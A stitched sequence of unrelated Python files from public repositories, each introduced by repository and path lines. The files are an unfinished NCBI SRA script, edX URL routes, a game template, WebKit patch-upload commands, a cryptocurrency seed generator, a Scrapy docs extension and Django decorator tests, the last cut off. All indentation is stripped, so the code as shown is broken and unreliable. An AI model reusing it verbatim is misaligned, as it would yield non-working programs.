# Import modules from The Python Standard Library.
import sys
###############################################################
# Module with methods that builds the sequence database.
class Build_Seq_DB:
# ============================================================
# Method to provide information on how to run this script.
@staticmethod
def how_to_use_script():
print "================================================="
print "==> This script builds an Org-mode database for"
print " SRA sequence reads in the NCBI database."
print
print "Required input arguments:"
print "1) Org-mode database"
print "2) URL to NCBI search results."
print
print "This script can be executed as follows:"
print "./build_sra_seq_db.py [Org-mode file] [input URL]"
print
print "================================================="
exit(1)
# Make this method a static method.
#how2use_script = staticmethod(how_to_use_script())
# ============================================================
# Preconditions.
@staticmethod
def preprocessing():
print 'Enter preprocessing method.'
"""
Are two input arguments provided to the execution of this
script?
"sys.argv" includes the name of the Python script as an
input argument to Python.
Hence, a Python script that was given 2 input arguments
would have 3 entries in "sys.argv".
Therefore, check if number of elements in "sys.argv" < 3.
"""
if len(sys.argv) < 3:
print 'Number of arguments:', len(sys.argv), 'arguments.'
print "Store search results in:::", sys.argv
Build_Seq_DB.how_to_use_script()
else:
print "how2use_script()"
# Is the path to the Org-mode database file provided?
print '#arguments:', len(sys.argv), 'arguments.'
#print "Store search results in:::", sys.argv[1]
# Make this method a static method.
#preprocessing = staticmethod(static_preprocessing())
# ============================================================
# Method to process online search results.
def postprocessing():
print "==> Start collecting SRA reads about search key."
# For each search result from the NCBI database.
# Get its index.
# Get its accesion number.
# Get its URL.
# Go to its web page.
# Get its publication date.
# Get its FTP link.
# Get submitter's organization.
# ============================================================
# Method to dump information into the Org-mode database.
def postprocessing():
print "==> Start collecting SRA reads about search key."
print "Ciao Mondo!!!"
Build_Seq_DB.preprocessing()
print "What's up"
|
jazkarta/edx-platform
|
refs/heads/master
|
lms/djangoapps/commerce/urls.py
|
57
|
"""
Defines the URL routes for this app.
"""
from django.conf.urls import patterns, url
from commerce import views
urlpatterns = patterns(
'',
url(r'^checkout/cancel/$', views.checkout_cancel, name='checkout_cancel'),
url(r'^checkout/receipt/$', views.checkout_receipt, name='checkout_receipt'),
)
|
anhstudios/swganh
|
refs/heads/develop
|
data/scripts/templates/object/mobile/shared_dressed_binayre_goon_bith_female_01.py
|
2
|
#### NOTICE: THIS FILE IS AUTOGENERATED
#### MODIFICATIONS MAY BE LOST IF DONE IMPROPERLY
#### PLEASE SEE THE ONLINE DOCUMENTATION FOR EXAMPLES
from swgpy.object import *
def create(kernel):
result = Creature()
result.template = "object/mobile/shared_dressed_binayre_goon_bith_female_01.iff"
result.attribute_template_id = 9
result.stfName("npc_name","bith_base_female")
#### BEGIN MODIFICATIONS ####
#### END MODIFICATIONS ####
return result
|
pigshell/nhnick
|
refs/heads/vnc-websocket
|
src/qt/qtwebkit/Tools/Scripts/webkitpy/tool/commands/upload.py
|
121
|
# Copyright (c) 2009, 2010 Google Inc. All rights reserved.
# Copyright (c) 2009 Apple Inc. All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are
# met:
#
# * Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above
# copyright notice, this list of conditions and the following disclaimer
# in the documentation and/or other materials provided with the
# distribution.
# * Neither the name of Google Inc. nor the names of its
# contributors may be used to endorse or promote products derived from
# this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
# A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
# OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
# SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
# LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
# DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
# THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
import logging
import os
import re
import sys
from optparse import make_option
from webkitpy.tool import steps
from webkitpy.common.checkout.changelog import parse_bug_id_from_changelog
from webkitpy.common.config.committers import CommitterList
from webkitpy.common.system.user import User
from webkitpy.thirdparty.mock import Mock
from webkitpy.tool.commands.abstractsequencedcommand import AbstractSequencedCommand
from webkitpy.tool.comments import bug_comment_from_svn_revision
from webkitpy.tool.grammar import pluralize, join_with_separators
from webkitpy.tool.multicommandtool import Command
_log = logging.getLogger(__name__)
class CommitMessageForCurrentDiff(Command):
name = "commit-message"
help_text = "Print a commit message suitable for the uncommitted changes"
def __init__(self):
options = [
steps.Options.git_commit,
]
Command.__init__(self, options=options)
def execute(self, options, args, tool):
# This command is a useful test to make sure commit_message_for_this_commit
# always returns the right value regardless of the current working directory.
print "%s" % tool.checkout().commit_message_for_this_commit(options.git_commit).message()
class CleanPendingCommit(Command):
name = "clean-pending-commit"
help_text = "Clear r+ on obsolete patches so they do not appear in the pending-commit list."
# NOTE: This was designed to be generic, but right now we're only processing patches from the pending-commit list, so only r+ matters.
def _flags_to_clear_on_patch(self, patch):
if not patch.is_obsolete():
return None
what_was_cleared = []
if patch.review() == "+":
if patch.reviewer():
what_was_cleared.append(u"%s's review+" % patch.reviewer().full_name)
else:
what_was_cleared.append("review+")
return join_with_separators(what_was_cleared)
def execute(self, options, args, tool):
committers = CommitterList()
for bug_id in tool.bugs.queries.fetch_bug_ids_from_pending_commit_list():
bug = self._tool.bugs.fetch_bug(bug_id)
patches = bug.patches(include_obsolete=True)
for patch in patches:
flags_to_clear = self._flags_to_clear_on_patch(patch)
if not flags_to_clear:
continue
message = u"Cleared %s from obsolete attachment %s so that this bug does not appear in http://webkit.org/pending-commit." % (flags_to_clear, patch.id())
self._tool.bugs.obsolete_attachment(patch.id(), message)
# FIXME: This should be share more logic with AssignToCommitter and CleanPendingCommit
class CleanReviewQueue(Command):
name = "clean-review-queue"
help_text = "Clear r? on obsolete patches so they do not appear in the pending-review list."
def execute(self, options, args, tool):
queue_url = "http://webkit.org/pending-review"
# We do this inefficient dance to be more like webkit.org/pending-review
# bugs.queries.fetch_bug_ids_from_review_queue() doesn't return
# closed bugs, but folks using /pending-review will see them. :(
for patch_id in tool.bugs.queries.fetch_attachment_ids_from_review_queue():
patch = self._tool.bugs.fetch_attachment(patch_id)
if not patch.review() == "?":
continue
attachment_obsolete_modifier = ""
if patch.is_obsolete():
attachment_obsolete_modifier = "obsolete "
elif patch.bug().is_closed():
bug_closed_explanation = " If you would like this patch reviewed, please attach it to a new bug (or re-open this bug before marking it for review again)."
else:
# Neither the patch was obsolete or the bug was closed, next patch...
continue
message = "Cleared review? from %sattachment %s so that this bug does not appear in %s.%s" % (attachment_obsolete_modifier, patch.id(), queue_url, bug_closed_explanation)
self._tool.bugs.obsolete_attachment(patch.id(), message)
class AssignToCommitter(Command):
name = "assign-to-committer"
help_text = "Assign bug to whoever attached the most recent r+'d patch"
def _patches_have_commiters(self, reviewed_patches):
for patch in reviewed_patches:
if not patch.committer():
return False
return True
def _assign_bug_to_last_patch_attacher(self, bug_id):
committers = CommitterList()
bug = self._tool.bugs.fetch_bug(bug_id)
if not bug.is_unassigned():
assigned_to_email = bug.assigned_to_email()
_log.info(u"Bug %s is already assigned to %s (%s)." % (bug_id, assigned_to_email, committers.committer_by_email(assigned_to_email)))
return
reviewed_patches = bug.reviewed_patches()
if not reviewed_patches:
_log.info("Bug %s has no non-obsolete patches, ignoring." % bug_id)
return
# We only need to do anything with this bug if one of the r+'d patches does not have a valid committer (cq+ set).
if self._patches_have_commiters(reviewed_patches):
_log.info("All reviewed patches on bug %s already have commit-queue+, ignoring." % bug_id)
return
latest_patch = reviewed_patches[-1]
attacher_email = latest_patch.attacher_email()
committer = committers.committer_by_email(attacher_email)
if not committer:
_log.info("Attacher %s is not a committer. Bug %s likely needs commit-queue+." % (attacher_email, bug_id))
return
reassign_message = u"Attachment %s was posted by a committer and has review+, assigning to %s for commit." % (latest_patch.id(), committer.full_name)
self._tool.bugs.reassign_bug(bug_id, committer.bugzilla_email(), reassign_message)
def execute(self, options, args, tool):
for bug_id in tool.bugs.queries.fetch_bug_ids_from_pending_commit_list():
self._assign_bug_to_last_patch_attacher(bug_id)
class ObsoleteAttachments(AbstractSequencedCommand):
name = "obsolete-attachments"
help_text = "Mark all attachments on a bug as obsolete"
argument_names = "BUGID"
steps = [
steps.ObsoletePatches,
]
def _prepare_state(self, options, args, tool):
return { "bug_id" : args[0] }
class AttachToBug(AbstractSequencedCommand):
name = "attach-to-bug"
help_text = "Attach the the file to the bug"
argument_names = "BUGID FILEPATH"
steps = [
steps.AttachToBug,
]
def _prepare_state(self, options, args, tool):
state = {}
state["bug_id"] = args[0]
state["filepath"] = args[1]
return state
class AbstractPatchUploadingCommand(AbstractSequencedCommand):
def _bug_id(self, options, args, tool, state):
# Perfer a bug id passed as an argument over a bug url in the diff (i.e. ChangeLogs).
bug_id = args and args[0]
if not bug_id:
changed_files = self._tool.scm().changed_files(options.git_commit)
state["changed_files"] = changed_files
bug_id = tool.checkout().bug_id_for_this_commit(options.git_commit, changed_files)
return bug_id
def _prepare_state(self, options, args, tool):
state = {}
state["bug_id"] = self._bug_id(options, args, tool, state)
if not state["bug_id"]:
_log.error("No bug id passed and no bug url found in ChangeLogs.")
sys.exit(1)
return state
class Post(AbstractPatchUploadingCommand):
name = "post"
help_text = "Attach the current working directory diff to a bug as a patch file"
argument_names = "[BUGID]"
steps = [
steps.ValidateChangeLogs,
steps.CheckStyle,
steps.ConfirmDiff,
steps.ObsoletePatches,
steps.SuggestReviewers,
steps.EnsureBugIsOpenAndAssigned,
steps.PostDiff,
]
class LandSafely(AbstractPatchUploadingCommand):
name = "land-safely"
help_text = "Land the current diff via the commit-queue"
argument_names = "[BUGID]"
long_help = """land-safely updates the ChangeLog with the reviewer listed
in bugs.webkit.org for BUGID (or the bug ID detected from the ChangeLog).
The command then uploads the current diff to the bug and marks it for
commit by the commit-queue."""
show_in_main_help = True
steps = [
steps.UpdateChangeLogsWithReviewer,
steps.ValidateChangeLogs,
steps.ObsoletePatches,
steps.EnsureBugIsOpenAndAssigned,
steps.PostDiffForCommit,
]
class HasLanded(AbstractPatchUploadingCommand):
name = "has-landed"
help_text = "Check that the current code was successfully landed and no changes remain."
argument_names = "[BUGID]"
steps = [
steps.HasLanded,
]
class Prepare(AbstractSequencedCommand):
name = "prepare"
help_text = "Creates a bug (or prompts for an existing bug) and prepares the ChangeLogs"
argument_names = "[BUGID]"
steps = [
steps.PromptForBugOrTitle,
steps.CreateBug,
steps.PrepareChangeLog,
]
def _prepare_state(self, options, args, tool):
bug_id = args and args[0]
return { "bug_id" : bug_id }
class Upload(AbstractPatchUploadingCommand):
name = "upload"
help_text = "Automates the process of uploading a patch for review"
argument_names = "[BUGID]"
show_in_main_help = True
steps = [
steps.ValidateChangeLogs,
steps.CheckStyle,
steps.PromptForBugOrTitle,
steps.CreateBug,
steps.PrepareChangeLog,
steps.EditChangeLog,
steps.ConfirmDiff,
steps.ObsoletePatches,
steps.SuggestReviewers,
steps.EnsureBugIsOpenAndAssigned,
steps.PostDiff,
]
long_help = """upload uploads the current diff to bugs.webkit.org.
If no bug id is provided, upload will create a bug.
If the current diff does not have a ChangeLog, upload
will prepare a ChangeLog. Once a patch is read, upload
will open the ChangeLogs for editing using the command in the
EDITOR environment variable and will display the diff using the
command in the PAGER environment variable."""
def _prepare_state(self, options, args, tool):
state = {}
state["bug_id"] = self._bug_id(options, args, tool, state)
return state
class EditChangeLogs(AbstractSequencedCommand):
name = "edit-changelogs"
help_text = "Opens modified ChangeLogs in $EDITOR"
show_in_main_help = True
steps = [
steps.EditChangeLog,
]
class PostCommits(Command):
name = "post-commits"
help_text = "Attach a range of local commits to bugs as patch files"
argument_names = "COMMITISH"
def __init__(self):
options = [
make_option("-b", "--bug-id", action="store", type="string", dest="bug_id", help="Specify bug id if no URL is provided in the commit log."),
make_option("--add-log-as-comment", action="store_true", dest="add_log_as_comment", default=False, help="Add commit log message as a comment when uploading the patch."),
make_option("-m", "--description", action="store", type="string", dest="description", help="Description string for the attachment (default: description from commit message)"),
steps.Options.obsolete_patches,
steps.Options.review,
steps.Options.request_commit,
]
Command.__init__(self, options=options, requires_local_commits=True)
def _comment_text_for_commit(self, options, commit_message, tool, commit_id):
comment_text = None
if (options.add_log_as_comment):
comment_text = commit_message.body(lstrip=True)
comment_text += "---\n"
comment_text += tool.scm().files_changed_summary_for_commit(commit_id)
return comment_text
def execute(self, options, args, tool):
commit_ids = tool.scm().commit_ids_from_commitish_arguments(args)
if len(commit_ids) > 10: # We could lower this limit, 10 is too many for one bug as-is.
_log.error("webkit-patch does not support attaching %s at once. Are you sure you passed the right commit range?" % (pluralize("patch", len(commit_ids))))
sys.exit(1)
have_obsoleted_patches = set()
for commit_id in commit_ids:
commit_message = tool.scm().commit_message_for_local_commit(commit_id)
# Prefer --bug-id=, then a bug url in the commit message, then a bug url in the entire commit diff (i.e. ChangeLogs).
bug_id = options.bug_id or parse_bug_id_from_changelog(commit_message.message()) or parse_bug_id_from_changelog(tool.scm().create_patch(git_commit=commit_id))
if not bug_id:
_log.info("Skipping %s: No bug id found in commit or specified with --bug-id." % commit_id)
continue
if options.obsolete_patches and bug_id not in have_obsoleted_patches:
state = { "bug_id": bug_id }
steps.ObsoletePatches(tool, options).run(state)
have_obsoleted_patches.add(bug_id)
diff = tool.scm().create_patch(git_commit=commit_id)
description = options.description or commit_message.description(lstrip=True, strip_url=True)
comment_text = self._comment_text_for_commit(options, commit_message, tool, commit_id)
tool.bugs.add_patch_to_bug(bug_id, diff, description, comment_text, mark_for_review=options.review, mark_for_commit_queue=options.request_commit)
# FIXME: This command needs to be brought into the modern age with steps and CommitInfo.
class MarkBugFixed(Command):
name = "mark-bug-fixed"
help_text = "Mark the specified bug as fixed"
argument_names = "[SVN_REVISION]"
def __init__(self):
options = [
make_option("--bug-id", action="store", type="string", dest="bug_id", help="Specify bug id if no URL is provided in the commit log."),
make_option("--comment", action="store", type="string", dest="comment", help="Text to include in bug comment."),
make_option("--open", action="store_true", default=False, dest="open_bug", help="Open bug in default web browser (Mac only)."),
make_option("--update-only", action="store_true", default=False, dest="update_only", help="Add comment to the bug, but do not close it."),
]
Command.__init__(self, options=options)
# FIXME: We should be using checkout().changelog_entries_for_revision(...) instead here.
def _fetch_commit_log(self, tool, svn_revision):
if not svn_revision:
return tool.scm().last_svn_commit_log()
return tool.scm().svn_commit_log(svn_revision)
def _determine_bug_id_and_svn_revision(self, tool, bug_id, svn_revision):
commit_log = self._fetch_commit_log(tool, svn_revision)
if not bug_id:
bug_id = parse_bug_id_from_changelog(commit_log)
if not svn_revision:
match = re.search("^r(?P<svn_revision>\d+) \|", commit_log, re.MULTILINE)
if match:
svn_revision = match.group('svn_revision')
if not bug_id or not svn_revision:
not_found = []
if not bug_id:
not_found.append("bug id")
if not svn_revision:
not_found.append("svn revision")
_log.error("Could not find %s on command-line or in %s."
% (" or ".join(not_found), "r%s" % svn_revision if svn_revision else "last commit"))
sys.exit(1)
return (bug_id, svn_revision)
def execute(self, options, args, tool):
bug_id = options.bug_id
svn_revision = args and args[0]
if svn_revision:
if re.match("^r[0-9]+$", svn_revision, re.IGNORECASE):
svn_revision = svn_revision[1:]
if not re.match("^[0-9]+$", svn_revision):
_log.error("Invalid svn revision: '%s'" % svn_revision)
sys.exit(1)
needs_prompt = False
if not bug_id or not svn_revision:
needs_prompt = True
(bug_id, svn_revision) = self._determine_bug_id_and_svn_revision(tool, bug_id, svn_revision)
_log.info("Bug: <%s> %s" % (tool.bugs.bug_url_for_bug_id(bug_id), tool.bugs.fetch_bug_dictionary(bug_id)["title"]))
_log.info("Revision: %s" % svn_revision)
if options.open_bug:
tool.user.open_url(tool.bugs.bug_url_for_bug_id(bug_id))
if needs_prompt:
if not tool.user.confirm("Is this correct?"):
self._exit(1)
bug_comment = bug_comment_from_svn_revision(svn_revision)
if options.comment:
bug_comment = "%s\n\n%s" % (options.comment, bug_comment)
if options.update_only:
_log.info("Adding comment to Bug %s." % bug_id)
tool.bugs.post_comment_to_bug(bug_id, bug_comment)
else:
_log.info("Adding comment to Bug %s and marking as Resolved/Fixed." % bug_id)
tool.bugs.close_bug_as_fixed(bug_id, bug_comment)
# FIXME: Requires unit test. Blocking issue: too complex for now.
class CreateBug(Command):
name = "create-bug"
help_text = "Create a bug from local changes or local commits"
argument_names = "[COMMITISH]"
def __init__(self):
options = [
steps.Options.cc,
steps.Options.component,
make_option("--no-prompt", action="store_false", dest="prompt", default=True, help="Do not prompt for bug title and comment; use commit log instead."),
make_option("--no-review", action="store_false", dest="review", default=True, help="Do not mark the patch for review."),
make_option("--request-commit", action="store_true", dest="request_commit", default=False, help="Mark the patch as needing auto-commit after review."),
]
Command.__init__(self, options=options)
def create_bug_from_commit(self, options, args, tool):
commit_ids = tool.scm().commit_ids_from_commitish_arguments(args)
if len(commit_ids) > 3:
_log.error("Are you sure you want to create one bug with %s patches?" % len(commit_ids))
sys.exit(1)
commit_id = commit_ids[0]
bug_title = ""
comment_text = ""
if options.prompt:
(bug_title, comment_text) = self.prompt_for_bug_title_and_comment()
else:
commit_message = tool.scm().commit_message_for_local_commit(commit_id)
bug_title = commit_message.description(lstrip=True, strip_url=True)
comment_text = commit_message.body(lstrip=True)
comment_text += "---\n"
comment_text += tool.scm().files_changed_summary_for_commit(commit_id)
diff = tool.scm().create_patch(git_commit=commit_id)
bug_id = tool.bugs.create_bug(bug_title, comment_text, options.component, diff, "Patch", cc=options.cc, mark_for_review=options.review, mark_for_commit_queue=options.request_commit)
if bug_id and len(commit_ids) > 1:
options.bug_id = bug_id
options.obsolete_patches = False
# FIXME: We should pass through --no-comment switch as well.
PostCommits.execute(self, options, commit_ids[1:], tool)
def create_bug_from_patch(self, options, args, tool):
bug_title = ""
comment_text = ""
if options.prompt:
(bug_title, comment_text) = self.prompt_for_bug_title_and_comment()
else:
commit_message = tool.checkout().commit_message_for_this_commit(options.git_commit)
bug_title = commit_message.description(lstrip=True, strip_url=True)
comment_text = commit_message.body(lstrip=True)
diff = tool.scm().create_patch(options.git_commit)
bug_id = tool.bugs.create_bug(bug_title, comment_text, options.component, diff, "Patch", cc=options.cc, mark_for_review=options.review, mark_for_commit_queue=options.request_commit)
def prompt_for_bug_title_and_comment(self):
bug_title = User.prompt("Bug title: ")
# FIXME: User should provide a function for doing this multi-line prompt.
print "Bug comment (hit ^D on blank line to end):"
lines = sys.stdin.readlines()
try:
sys.stdin.seek(0, os.SEEK_END)
except IOError:
# Cygwin raises an Illegal Seek (errno 29) exception when the above
# seek() call is made. Ignoring it seems to cause no harm.
# FIXME: Figure out a way to get avoid the exception in the first
# place.
pass
comment_text = "".join(lines)
return (bug_title, comment_text)
def execute(self, options, args, tool):
if len(args):
if (not tool.scm().supports_local_commits()):
_log.error("Extra arguments not supported; patch is taken from working directory.")
sys.exit(1)
self.create_bug_from_commit(options, args, tool)
else:
self.create_bug_from_patch(options, args, tool)
|
antcheck/antcoin
|
refs/heads/master
|
share/seeds/generate-seeds.py
|
1
|
#!/usr/bin/python
# Copyright (c) 2014 Wladmir J. van der Laan
# Distributed under the MIT software license, see the accompanying
# file COPYING or http://www.opensource.org/licenses/mit-license.php.
'''
Script to generate list of seed nodes for chainparams.cpp.
This script expects two text files in the directory that is passed as an
argument:
nodes_main.txt
nodes_test.txt
These files must consist of lines in the format
<ip>
<ip>:<port>
[<ipv6>]
[<ipv6>]:<port>
<onion>.onion
0xDDBBCCAA (IPv4 little-endian old pnSeeds format)
The output will be two data structures with the peers in binary format:
static SeedSpec6 pnSeed6_main[]={
...
}
static SeedSpec6 pnSeed6_test[]={
...
}
These should be pasted into `src/chainparamsseeds.h`.
'''
from __future__ import print_function, division
from base64 import b32decode
from binascii import a2b_hex
import sys, os
import re
# ipv4 in ipv6 prefix
pchIPv4 = bytearray([0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0xff, 0xff])
# tor-specific ipv6 prefix
pchOnionCat = bytearray([0xFD,0x87,0xD8,0x7E,0xEB,0x43])
def name_to_ipv6(addr):
if len(addr)>6 and addr.endswith('.onion'):
vchAddr = b32decode(addr[0:-6], True)
if len(vchAddr) != 16-len(pchOnionCat):
raise ValueError('Invalid onion %s' % s)
return pchOnionCat + vchAddr
elif '.' in addr: # IPv4
return pchIPv4 + bytearray((int(x) for x in addr.split('.')))
elif ':' in addr: # IPv6
sub = [[], []] # prefix, suffix
x = 0
addr = addr.split(':')
for i,comp in enumerate(addr):
if comp == '':
if i == 0 or i == (len(addr)-1): # skip empty component at beginning or end
continue
x += 1 # :: skips to suffix
assert(x < 2)
else: # two bytes per component
val = int(comp, 16)
sub[x].append(val >> 8)
sub[x].append(val & 0xff)
nullbytes = 16 - len(sub[0]) - len(sub[1])
assert((x == 0 and nullbytes == 0) or (x == 1 and nullbytes > 0))
return bytearray(sub[0] + ([0] * nullbytes) + sub[1])
elif addr.startswith('0x'): # IPv4-in-little-endian
return pchIPv4 + bytearray(reversed(a2b_hex(addr[2:])))
else:
raise ValueError('Could not parse address %s' % addr)
def parse_spec(s, defaultport):
match = re.match('\[([0-9a-fA-F:]+)\](?::([0-9]+))?$', s)
if match: # ipv6
host = match.group(1)
port = match.group(2)
else:
(host,_,port) = s.partition(':')
if not port:
port = defaultport
else:
port = int(port)
host = name_to_ipv6(host)
return (host,port)
def process_nodes(g, f, structname, defaultport):
g.write('static SeedSpec6 %s[] = {\n' % structname)
first = True
for line in f:
comment = line.find('#')
if comment != -1:
line = line[0:comment]
line = line.strip()
if not line:
continue
if not first:
g.write(',\n')
first = False
(host,port) = parse_spec(line, defaultport)
hoststr = ','.join(('0x%02x' % b) for b in host)
g.write(' {{%s}, %i}' % (hoststr, port))
g.write('\n};\n')
def main():
if len(sys.argv)<2:
print(('Usage: %s <path_to_nodes_txt>' % sys.argv[0]), file=sys.stderr)
exit(1)
g = sys.stdout
indir = sys.argv[1]
g.write('#ifndef BITCOIN_CHAINPARAMSSEEDS_H\n')
g.write('#define BITCOIN_CHAINPARAMSSEEDS_H\n')
g.write('/**\n')
g.write(' * List of fixed seed nodes for the antcoin network\n')
g.write(' * AUTOGENERATED by share/seeds/generate-seeds.py\n')
g.write(' *\n')
g.write(' * Each line contains a 16-byte IPv6 address and a port.\n')
g.write(' * IPv4 as well as onion addresses are wrapped inside a IPv6 address accordingly.\n')
g.write(' */\n')
with open(os.path.join(indir,'nodes_main.txt'),'r') as f:
process_nodes(g, f, 'pnSeed6_main', 17771)
g.write('\n')
with open(os.path.join(indir,'nodes_test.txt'),'r') as f:
process_nodes(g, f, 'pnSeed6_test', 17772)
g.write('#endif // BITCOIN_CHAINPARAMSSEEDS_H\n')
if __name__ == '__main__':
main()
|
mouadino/scrapy
|
refs/heads/master
|
docs/_ext/scrapydocs.py
|
2
|
from docutils.parsers.rst.roles import set_classes
from docutils import nodes
def setup(app):
app.add_crossref_type(
directivename = "setting",
rolename = "setting",
indextemplate = "pair: %s; setting",
)
app.add_crossref_type(
directivename = "signal",
rolename = "signal",
indextemplate = "pair: %s; signal",
)
app.add_crossref_type(
directivename = "command",
rolename = "command",
indextemplate = "pair: %s; command",
)
app.add_crossref_type(
directivename = "reqmeta",
rolename = "reqmeta",
indextemplate = "pair: %s; reqmeta",
)
app.add_role('source', source_role)
app.add_role('commit', commit_role)
app.add_role('rev', rev_role)
def source_role(name, rawtext, text, lineno, inliner, options={}, content=[]):
ref = 'https://github.com/scrapy/scrapy/blob/master/' + text
set_classes(options)
node = nodes.reference(rawtext, text, refuri=ref, **options)
return [node], []
def commit_role(name, rawtext, text, lineno, inliner, options={}, content=[]):
ref = 'https://github.com/scrapy/scrapy/commit/' + text
set_classes(options)
node = nodes.reference(rawtext, 'commit ' + text, refuri=ref, **options)
return [node], []
def rev_role(name, rawtext, text, lineno, inliner, options={}, content=[]):
ref = 'http://hg.scrapy.org/scrapy/changeset/' + text
set_classes(options)
node = nodes.reference(rawtext, 'r' + text, refuri=ref, **options)
return [node], []
|
mixman/djangodev
|
refs/heads/master
|
tests/regressiontests/decorators/tests.py
|
1
|
import warnings
from functools import wraps
from django.contrib.admin.views.decorators import staff_member_required
from django.contrib.auth.decorators import login_required, permission_required, user_passes_test
from django.http import HttpResponse, HttpRequest, HttpResponseNotAllowed
from django.middleware.clickjacking import XFrameOptionsMiddleware
from django.test.utils import get_warnings_state, restore_warnings_state
from django.utils.decorators import method_decorator
from django.utils.functional import allow_lazy, lazy, memoize
from django.utils.unittest import TestCase
from django.views.decorators.cache import cache_page, never_cache, cache_control
from django.views.decorators.clickjacking import xframe_options_deny, xframe_options_sameorigin, xframe_options_exempt
from django.views.decorators.http import require_http_methods, require_GET, require_POST, require_safe
from django.views.decorators.vary import vary_on_headers, vary_on_cookie
def fully_decorated(request):
"""Expected __doc__"""
return HttpResponse('<html><body>dummy</body></html>')
fully_decorated.anything = "Expected __dict__"
def compose(*functions):
# compose(f, g)(*args, **kwargs) == f(g(*args, **kwargs))
functions = list(reversed(functions))
def _inner(*args, **kwargs):
result = functions[0](*args, **kwargs)
for f in functions[1:]:
result = f(result)
return result
return _inner
full_decorator = compose(
# django.views.decorators.http
require_http_methods(["GET"]),
require_GET,
require_POST,
require_safe,
# django.views.decorators.vary
vary_on_headers('Accept-language'),
vary_on_cookie,
# django.views.decorators.cache
cache_page(60*15),
cache_control(private=True),
never_cache,
# django.contrib.auth.decorators
# Apply user_passes_test twice to check #9474
user_passes_test(lambda u:True),
login_required,
permission_required('change_world'),
# django.contrib.admin.views.decorators
staff_member_required,
# django.utils.functional
lambda f: memoize(f, {}, 1),
allow_lazy,
lazy,
)
fully_decorated = full_decorator(fully_decorated)
class DecoratorsTest(TestCase):
def setUp(self):
self.warning_state = get_warnings_state()
warnings.filterwarnings('ignore', category=PendingDeprecationWarning,
module='django.views.decorators.cache')
def tearDown(self):
restore_warnings_state(self.warning_state)
def test_attributes(self):
"""
Tests that django decorators set certain attributes of the wrapped
function.
"""
self.assertEqual(fully_decorated.__name__, 'fully_decorated')
self.assertEqual(fully_decorated.__doc__, 'Expected __doc__')
self.assertEqual(fully_decorated.__dict__['anything'], 'Expected __dict__')
def test_user_passes_test_composition(self):
"""
Test that the user_passes_test decorator can be applied multiple times
(#9474).
"""
def test1(user):
user.decorators_applied.append('test1')
return True
def test2(user):
user.decorators_applied.append('test2')
return True
def callback(request):
return request.user.decorators_applied
callback = user_passes_test(test1)(callback)
callback = user_passes_test(test2)(callback)
class DummyUser(object): pass
class DummyRequest(object): pass
request = DummyRequest()
request.user = DummyUser()
request.user.decorators_applied = []
response = callback(request)
self.assertEqual(response, ['test2', 'test1'])
def test_cache_page_new_style(self):
"""
Test that we can call cache_page the new way
"""
def my_view(request):
return "response"
my_view_cached = cache_page(123)(my_view)
self.assertEqual(my_view_cached(HttpRequest()), "response")
my_view_cached2 = cache_page(123, key_prefix="test")(my_view)
self.assertEqual(my_view_cached2(HttpRequest()), "response")
def test_cache_page_old_style(self):
"""
Test that we can call cache_page the old way
"""
def my_view(request):
return "response"
my_view_cached = cache_page(my_view, 123)
self.assertEqual(my_view_cached(HttpRequest()), "response")
my_view_cached2 = cache_page(my_view, 123, key_prefix="test")
self.assertEqual(my_view_cached2(HttpRequest()), "response")
my_view_cached3 = cache_page(my_view)
self.assertEqual(my_view_cached3(HttpRequest()), "response")
my_view_cached4 = cache_page()(my_view)
self.assertEqual(my_view_cached4(HttpRequest()), "response")
def test_require_safe_accepts_only_safe_methods(self):
"""
Test for the require_safe decorator.
A view returns either a response or an exception.
Refs #15637.
"""
def my_view(request):
return HttpResponse("OK")
my_safe_view = require_safe(my_view)
request = HttpRequest()
request.method = 'GET'
self.assertTrue(isinstance(my_safe_view(request), HttpResponse))
request.method = 'HEAD'
self.assertTrue(isinstance(my_safe_view(request), HttpResponse))
request.method = 'POST'
self.assertTrue(isinstance(my_safe_view(request), HttpResponseNotAllowed))
request.method = 'PUT'
self.assertTrue(isinstance(my_safe_view(request), HttpResponseNotAllowed))
request.method = 'DELETE'
self.assertTrue(isinstance(my_safe_view(request), HttpResponseNotAllowed))
# For testing method_decorator, a decorator that assumes a single argument.
# We will get type arguments if there is a mismatch in the number of arguments.
def simple_dec(func):
def wrapper(arg):
return func("test:" + arg)
return wraps(func)(wrapper)
simple_dec_m = method_decorator(simple_dec)
# For testing method_decorator, two decorators that add an attribute to the function
def myattr_dec(func):
def wrapper(*args, **kwargs):
return func(*args, **kwargs)
wrapper.myattr = True
return wraps(func)(wrapper)
myattr_dec_m = method_decorator(myattr_dec)
def myattr2_dec(func):
def wrapper(*args, **kwargs):
return func(*args, **kwargs)
wrapper.myattr2 = True
return wraps(func)(wrapper)
myattr2_dec_m = method_decorator(myattr2_dec)
class MethodDecoratorTests(TestCase):
"""
Tests for method_decorator
"""
def test_preserve_signature(self):
class Test(object):
@simple_dec_m
def say(self, arg):
return arg
self.assertEqual("test:hello", Test().say("hello"))
def test_preserve_attributes(self):
# Sanity check myattr_dec and myattr2_dec
@myattr_dec
@myattr2_dec
def func():
pass
self.assertEqual(getattr(func, 'myattr', False), True)
self.assertEqual(getattr(func, 'myattr2', False), True)
# Now check method_decorator
class Test(object):
@myattr_dec_m
@myattr2_dec_m
def method(self):
"A method"
pass
self.assertEqual(getattr(Test().method, 'myattr', False), True)
